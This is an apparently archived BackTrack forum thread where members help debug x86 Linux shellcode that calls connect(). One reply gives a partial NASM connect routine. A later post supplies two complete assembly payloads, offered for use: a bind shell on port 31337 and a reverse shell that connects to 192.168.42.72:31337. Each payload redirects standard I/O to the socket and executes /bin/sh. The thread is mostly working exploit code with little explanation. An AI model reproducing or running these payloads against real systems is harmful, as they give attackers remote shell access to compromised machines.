Results 1 to 7 of 7

Thread: Shellcode for connect() Function

  1. #1
    Just burned his ISO
    Join Date
    Aug 2012
    Posts
    1

    Default Shellcode for connect() Function

    I am writing shellcode on BackTrack 5 R2 x86 running in Virtualbox and the registers prior to the int 0x80 syscall look like this:

    eax 0x66
    ecx 0x8e60558
    edx 0x0
    ebx 0x3

    which is set up for the connect() syscall. The value in the ecx register is an argument array that contains:

    0x8e60558: 0x00000009 0x8e60583 0x00000010

    where 0x00000009 is the file descriptor, 0x8e60583 is the server struct pointer that points to:

    0x8e60583: 0x00000002 0x0000115c 0x0100007f

    which is:

    [address]: [AF_INET=2] [PORT=4444] [IP=127.0.0.1]

    I know that the file descriptor is correct and all of the constant values set up in the registers like storing 0x66 in eax (socketcall is syscall #102) are correct to the best of my knowledge yet when I run the code, which should return the connected socket FD in the eax register, it returns:

    eax: 0xffffff9b

    which is the error code for "network unreachable". What I have I done incorrectly? Would it have to anything to do with the network settings of Virtualbox?

    EDIT: This doesn't have anything to do with the endianess as I have tried both network byte order and little endian.

  2. #2
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    At the time of execution, did you have a socket server binded to that port (4444)?

    Based on your problem above here's an example i wrote using BacTrack and NASM:

    I Hope this helps.

    Code:
    section .text
        global _start
    
    _sys_exit:
        mov eax, 0x1
        int 0x80
    
    _socket:
    ; int _socket(int domain,int type,int protocol)
        push 0x0		; 0
        push 0x1		; 1 = SOCK_STREAM
        push 0x2		; 2 = PF_INET
        mov ecx, esp	; ecx* = stack_arguments
        mov ebx, 0x1	; _socket()
        mov eax, 102	; socketcall()
        int 0x80		; _syscall
        add esp,12
        ret 
    
    _connect:
    ; int connect(int fd,const struct sockaddr *addr,socklen_t len)
        
        push 0x10		; len = 16 bytes
        push sockstruct	; &sockstruct
        push eax		; file description
        mov ecx,esp		; ecx* = stack_arguments
        mov ebx,0x3		; _connect()
        mov eax,102    	; socketcall()
        int 0x80		; _syscall
        add esp,12
        ret
    
    _start:
        call _socket
        call _connect
    
        ;call sys_write
    
        call _sys_exit
    
    
    section .data
        sockstruct dq 0x5c11,0x0100007f	;('4444','127.0.0.1')
    Last edited by savioboyz; 08-10-2012 at 01:11 AM.
    Saviour Emmauel Ekiko

  3. #3
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    that shellcode will fail as shellcode, sorry

    try this
    Code:
    BITS 32
    
    ; s = socket(2, 1, 0)
      push BYTE 0x66    ; socketcall is syscall #102 (0x66)
      pop eax
      cdq               ; zero out edx for use as a null DWORD later
      xor ebx, ebx      ; ebx is the type of socketcall
      inc ebx           ; 1 = SYS_SOCKET = socket() 
      push edx          ; Build arg array: { protocol = 0,
      push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
      push BYTE 0x2     ;                    AF_INET = 2 }
      mov ecx, esp      ; ecx = ptr to argument array
      int 0x80          ; after syscall, eax has socket file descriptor
      
      mov esi, eax      ; save socket FD in esi for later
    
    ; bind(s, [2, 31337, 0], 16)
      push BYTE 0x66    ; socketcall (syscall #102) 
      pop eax
      inc ebx           ; ebx = 2 = SYS_BIND = bind()
      push edx          ; Build sockaddr struct:  INADDR_ANY = 0
      push WORD 0x697a  ;   (in reverse order)    PORT = 31337
      push WORD bx      ;                         AF_INET = 2
      mov ecx, esp      ; ecx = server struct pointer
      push BYTE 16      ; argv: { sizeof(server struct) = 16,
      push ecx          ;         server struct pointer,
      push esi          ;         socket file descriptor }
      mov ecx, esp      ; ecx = argument array
      int 0x80          ; eax = 0 on success
    
    ; listen(s, 0)
      mov BYTE al, 0x66 ; socketcall (syscall #102) 
      inc ebx
      inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
      push ebx          ; argv: { backlog = 4,
      push esi          ;         socket fd }
      mov ecx, esp      ; ecx = argument array
      int 0x80
    
    ; c = accept(s, 0, 0)
      mov BYTE al, 0x66 ; socketcall (syscall #102) 
      inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
      push edx          ; argv: { socklen = 0,
      push edx          ;         sockaddr ptr = NULL,
      push esi          ;         socket fd }
      mov ecx, esp      ; ecx = argument array
      int 0x80          ; eax = connected socket FD
    
    ; dup2(connected socket, {all three standard I/O file descriptors})
      mov ebx, eax      ; move socket FD in ebx
      push BYTE 0x3F    ; dup2  syscall #63
      pop eax
      xor ecx, ecx      ; ecx = 0 = standard input
      int 0x80          ; dup(c, 0)
      mov BYTE al, 0x3F ; dup2  syscall #63
      inc ecx           ; ecx = 1 = standard output
      int 0x80          ; dup(c, 1)
      mov BYTE al, 0x3F ; dup2  syscall #63
      inc ecx           ; ecx = 2 = standard error
      int 0x80          ; dup(c, 2)
    
    ; execve(const char *filename, char *const argv [], char *const envp[])
      mov BYTE al, 11   ; execve  syscall #11
      push edx          ; push some nulls for string termination
      push 0x68732f2f   ; push "//sh" to the stack
      push 0x6e69622f   ; push "/bin" to the stack
      mov ebx, esp      ; put the address of "/bin//sh" into ebx, via esp
      push edx          ; push 32-bit null terminator to stack
      mov edx, esp      ; this is an empty array for envp
      push ebx          ; push string addr to stack above null terminator
      mov ecx, esp      ; this is the argv array with string ptr
      int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
    Heres a reverse shell if you like...

    Code:
    BITS 32
    
    ; s = socket(2, 1, 0)
      push BYTE 0x66    ; socketcall is syscall #102 (0x66)
      pop eax
      cdq               ; zero out edx for use as a null DWORD later
      xor ebx, ebx      ; ebx is the type of socketcall
      inc ebx           ; 1 = SYS_SOCKET = socket() 
      push edx          ; Build arg array: { protocol = 0,
      push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
      push BYTE 0x2     ;                    AF_INET = 2 }
      mov ecx, esp      ; ecx = ptr to argument array
      int 0x80          ; after syscall, eax has socket file descriptor
      
      xchg esi, eax     ; save socket FD in esi for later
    
    ; connect(s, [2, 31337, <IP address>], 16)
      push BYTE 0x66    ; socketcall (syscall #102) 
      pop eax
      inc ebx           ; ebx = 2 (needed for AF_INET)
      push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72
      push WORD 0x697a  ;   (in reverse order)    PORT = 31337
      push WORD bx      ;                         AF_INET = 2
      mov ecx, esp      ; ecx = server struct pointer
      push BYTE 16      ; argv: { sizeof(server struct) = 16,
      push ecx          ;         server struct pointer,
      push esi          ;         socket file descriptor }
      mov ecx, esp      ; ecx = argument array
      inc ebx           ; ebx = 3 = SYS_CONNECT = connect()
      int 0x80          ; eax = 0 on successful connection
    
    ;  jz success        ; if connection successful, jump down to spawn shell
    ;  xor eax, eax      ; otherwise, exit cleanly
    ;  inc eax           ; eax = 1 exit (syscall #1)
    ;  xor ebx, ebx      ; status = 0  (nothing to see here)
    ;  int 0x80
    
    ;success:
    ; dup2(connected socket, {all three standard I/O file descriptors})
      xchg esi, ebx     ; put socket FD from esi into ebx (esi = 3)
      xchg ecx, esi     ; ecx = 3
      dec ecx           ; ecx starts at 2
    ;  xchg eax, esi     ; eax = 0x00000003  
    ;  push BYTE 0x2
    ;  pop ecx           ; ecx starts at 2
    ;dup_loop:
      mov BYTE al, 0x3F ; dup2  syscall #63
      int 0x80          ; dup2(c, 0)
      dec ecx           ; count down to 0 
      mov BYTE al, 0x3F ; dup2  syscall #63
      int 0x80          ; dup2(c, 0)
      dec ecx           ; count down to 0 
      mov BYTE al, 0x3F ; dup2  syscall #63
      int 0x80          ; dup2(c, 0)
      dec ecx           ; count down to 0 
     ; jns dup_loop      ; if the sign flag is not set, ecx is not negative
    
    ; execve(const char *filename, char *const argv [], char *const envp[])
      mov BYTE al, 11   ; execve  syscall #11
      push edx          ; push some nulls for string termination
      push 0x68732f2f   ; push "//sh" to the stack
      push 0x6e69622f   ; push "/bin" to the stack
      mov ebx, esp      ; put the address of "/bin//sh" into ebx, via esp
      push edx          ; push 32-bit null terminator to stack
      mov edx, esp      ; this is an empty array for envp
      push ebx          ; push string addr to stack above null terminator
      mov ecx, esp      ; this is the argv array with string ptr
      int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])
    Let me know if this works.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  4. #4
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    "that shellcode will fail as shellcode, sorry"

    I assumed the original poster was already a shellcode writter, so i did'nt intend completing the code (a connection handler is obviously absent
    after the connect routine), I made it incomplete since the original poster did'nt request for a complete code, but only asked for help with only the part he was currently stuck.

    Great work with the complete stuff, i guess that will prove more useful
    Last edited by savioboyz; 08-10-2012 at 12:55 PM.
    Saviour Emmauel Ekiko

  5. #5
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    No worries. I was more concerned with the data section at the end since all shellcode needs to be inline... But it's still a good example.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  6. #6
    Senior Member savioboyz's Avatar
    Join Date
    Oct 2010
    Location
    Nigeria
    Posts
    118

    Default Re: Shellcode for connect() Function

    For how many years have you been writting shellcodes?
    Last edited by savioboyz; 08-10-2012 at 01:28 PM.
    Saviour Emmauel Ekiko

  7. #7
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: Shellcode for connect() Function

    For about five months, ever since I started working on my script here: http://www.backtrack-linux.org/forum...ad.php?t=51129
    World Domination is such an ugly phrase. I prefer the term World Optimization.

Similar Threads

  1. Is there something wrong with the search function?
    By bishop101 in forum BackTrack 5 General Topics
    Replies: 21
    Last Post: 02-21-2012, 09:42 PM
  2. My HP Mini fan(s) don't seem to function right.
    By DrWeedBot in forum Beginners Forum
    Replies: 1
    Last Post: 07-20-2010, 01:17 PM
  3. Rainbowcrack (rcrack function)
    By Morgatte in forum Beginners Forum
    Replies: 2
    Last Post: 06-02-2010, 11:37 AM
  4. No USB function in Backtrack
    By thebigfatgeek in forum OLD Newbie Area
    Replies: 5
    Last Post: 07-02-2007, 09:23 PM
  5. Cia Commander function in BT
    By Itssid in forum OLD LiveCD Support
    Replies: 2
    Last Post: 04-22-2007, 09:38 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •